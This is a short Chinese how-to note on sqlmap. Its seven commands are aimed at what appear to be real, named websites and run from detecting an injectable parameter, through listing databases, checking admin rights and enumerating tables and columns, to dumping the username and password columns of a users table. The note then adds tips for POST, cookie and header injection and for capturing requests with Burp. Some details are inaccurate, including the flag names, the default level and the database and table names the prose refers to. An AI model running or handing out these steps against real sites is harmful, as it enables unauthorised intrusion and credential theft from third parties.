sqlmap使用笔记

1. sqlmap.py -u "http://www.jiangduoduo.com/lottery/#/kaijiang/detail/?LottID=1&IssueID=1336706&Issue=2018103"

判断id参数是否存在注入:结果中包含 “id” is Vulnerable  字段表示存在注入

存在注入,下面的步骤才可以执行成功~

2. sqlmap.py -u "http://www.intanelectric.com/application/php/product-detail.php?id=1"  --dbs

列举能列出的所有数据库名

3.  sqlmap.py -u "http://www.intanelectric.com/application/php/product-detail.php?id=1" --current-db

列出当前使用的数据库名,假设列出“mobile”数据库

4.  sqlmap.py -u "http://www.intanelectric.com/application/php/product-detail.php?id=1"  --is-dba

判断该注入点是否有管理员权限:返回true  表示是管理员

5.  sqlmap.py -u "http://www.intanelectric.com/application/php/product-detail.php?id=1" -D "intanele_web" --tables

获取mobile中的所有表,假设有"admin"表

6.  sqlmap.py -u "http://www.intanelectric.com/application/php/product-detail.php?id=1" -D "intanele_web" -T "nuranti_users" --columns

列举表admin的字段(列名),假设存在"username","password"字段

7.  sqlmap.py -u "http://www.intanelectric.com/application/php/product-detail.php?id=1" -D "intanele_web" -T "nuranti_users" -C "user_name,password" --dump

下载字段username,password的值,若询问是否破解md5加密,选择no即可

至此,对一个简单的注入点(GET方式),现在就已经得到了我们想要的数据

想看工具的注入过程 使用-v参数

-level 会提高注入等级(默认0 只会判断get,post参数是否有注入点)

若注入点是POST方式,或是注入点才Cookie,User-Agent中,可以利用-Date 参数 -Cookie参数指定

当然用buip Suite架个代理,截取数据包,直接 -r 参数引入数据包也可以完成上述的注入情况的~

你可能感兴趣的:(sqlmap使用笔记)